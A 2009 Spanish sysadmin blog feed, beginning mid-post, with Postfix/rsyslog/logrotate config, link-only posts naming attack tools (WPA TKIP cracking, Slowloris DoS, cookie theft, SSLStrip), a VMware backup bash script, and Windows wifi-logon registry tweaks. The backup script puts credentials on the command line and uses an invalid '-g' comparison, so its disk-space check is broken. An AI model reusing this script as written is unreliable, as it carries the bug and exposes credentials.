syslog_name=postfix_smtpExtern

/etc/postfix-out/main.cf :
--------------------------
syslog_facility=local2
syslog_name=postfix_smtpIntern

/etc/rsyslog.conf :
-------------------
# Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
*.info;mail.none;authpriv.none;cron.none;local1.none;local2.none /var/log/messages
(...)
local2.* -/var/log/smtpdIntern.log
local1.* -/var/log/smtpdExtern.log

Reiniciar demonios:
-------------------
/etc/init.d/rsyslog restart
/etc/init.d/postfix restart
/etc/init.d/postfix-out restart

*********************************************************************************

ROTANDO LOS 2 ARCHIVOS DE LOG CON LOGROTATE:
============================================

/etc/logrotate.d/syslog (Postfix usa syslog):
---------------------------------------------
/var/log/smtpdIntern.log {
sharedscripts
missingok
weekly
compress
# delaycompress
create
postrotate
/etc/init.d/rsyslog restart
/etc/init.d/postfix-out reload
endscript
rotate 12
mail user@host.com
}

/var/log/smtpdExtern.log {
sharedscripts
missingok
weekly
compress
# delaycompress
create
weekly
postrotate
/etc/init.d/rsyslog restart
/etc/init.d/postfix reload
endscript
rotate 12
mail user@host.com
}

*********************************************************************************

COMPROBACION FORZANDO ROTACIONES CON LOGROTATE:
===============================================

/usr/sbin/logrotate --force /etc/logrotate.d/syslog

WPA + TKIP. Probando con tkiptun-ng

noreply@blogger.com (vlan7) — Wed, 24 Jun 2009 18:58:00 +0000

http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55867

Gracias a Vic_Thor por la info _de primera mano_, pues es muy dificil encontrar informacion sobre esta herramienta.

Ah, salio la version 1.0 para win, aunque no la he probado.

Slowloris - HTTP DoS

noreply@blogger.com (vlan7) — Wed, 24 Jun 2009 18:54:00 +0000

http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55898

Gracias Sor_Zitroen por la noticia!

Jugando a robar cookies con surfjack

noreply@blogger.com (vlan7) — Tue, 23 Jun 2009 08:49:00 +0000

http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55853

Jugando y burlando a SSL con SSLStrip

noreply@blogger.com (vlan7) — Mon, 22 Jun 2009 10:48:00 +0000

http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55846

PD Gracias al compañero Popolous por el post-it ;)

VMWare disaster recovery

noreply@blogger.com (vlan7) — Wed, 03 Jun 2009 16:35:00 +0000

La idea es tener una tarea cron que copie las maquinas virtuales de un host fisico a otro host fisico VMWare.

No se realiza escritura a disco, pues en VMWare es lo que mas penalizado se ve. Se comprime todo en un lado del tunel ssh, y por el otro lado se va descomprimiendo.

Ahi va:

#!/bin/bash
#
#Copia VMs de FISICA1 a FISICA2 para Disaster Recovery
#
#vlan7 / 13-5-09
#

ALERTA=80 #20% espacio libre
ssh fisica2 df -HP |grep mapper | awk '{ print $5 " " $1 }' |awk '{ print $1}' | cut -d'%' -f1 >/tmp/output
uso=$(cat /tmp/output)

if [ $uso -g $ALERTA ]; then
echo "$uso % de espacio utilizado a fisica2, abortando copia" >>/var/log/copiaVMsVMWare.log
fi

if [ $uso -le $ALERTA ]; then
#host1
echo "Apagando la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log
vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd stop "[standard] host1/host1.vmx" soft
echo "Apagada la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log
tar czvf - /var/lib/vmware/Virtual\ Machines/host1/ |ssh fisica2 "cd / ; tar xzvf -"
echo "Encendiendo la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log
vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd start "[standard] host1/host1.vmx"
echo "Encendida la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log

#list all available VMs to log
vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd list >>/var/log/copiaVMsVMWare.log
fi

#enviando correo
tail -100 /var/log/copiaVMsVMWare.log | mail -s "[script] copiaVMsVMWare.sh" user@host.com

Asistente agregar impresoras linea de comandos

noreply@blogger.com (vlan7) — Fri, 13 Mar 2009 16:29:00 +0000

RUNDLL32 PRINTUI.DLL,PrintUIEntry /il

Mas ejemplos en http://www.robvanderwoude.com/2kprintcontrol.php

A mi me fue util en una ocasion...

Equipos wireless iniciar sesion en dominio

noreply@blogger.com (vlan7) — Wed, 25 Feb 2009 18:09:00 +0000

Si un equipo nunca ha iniciado sesion en un dominio, no tendra guardadas las credenciales en cache. Esto es un problema para equipos wifi que quieran iniciar sesion en el dominio de nuestra organizacion.

Y aunque tengan guardadas las credenciales en cache, no se ejecutara en su maquina ningun logonscript.

La solucion es cargar y activar la tarjeta wifi antes del inicio de sesion, antes de autenticarse.

Yo me quedo con esta manera de hacerlo:

1. Usar el servicio Windows Zero Configuration (Inicio de sesion wifi facil o algo asi se llama en castellano)

2. regedit. HKLM \ Software \ Microsoft \ WindowsNT \ CurrentVersion \ Winlogon
Añadir valor DWORD GpNetworkStartTimeoutPolicyValue 3c (hexa) o 60 (dec)

3. regedit. HKLM \ Software \ Policies \ Microsoft \ Windows \ System
Añadir valor DWORD GroupPolicyMinTransferRate a 0.

Y los clientes ya podran iniciar sesion como si estuvieran conectados a la red cableada.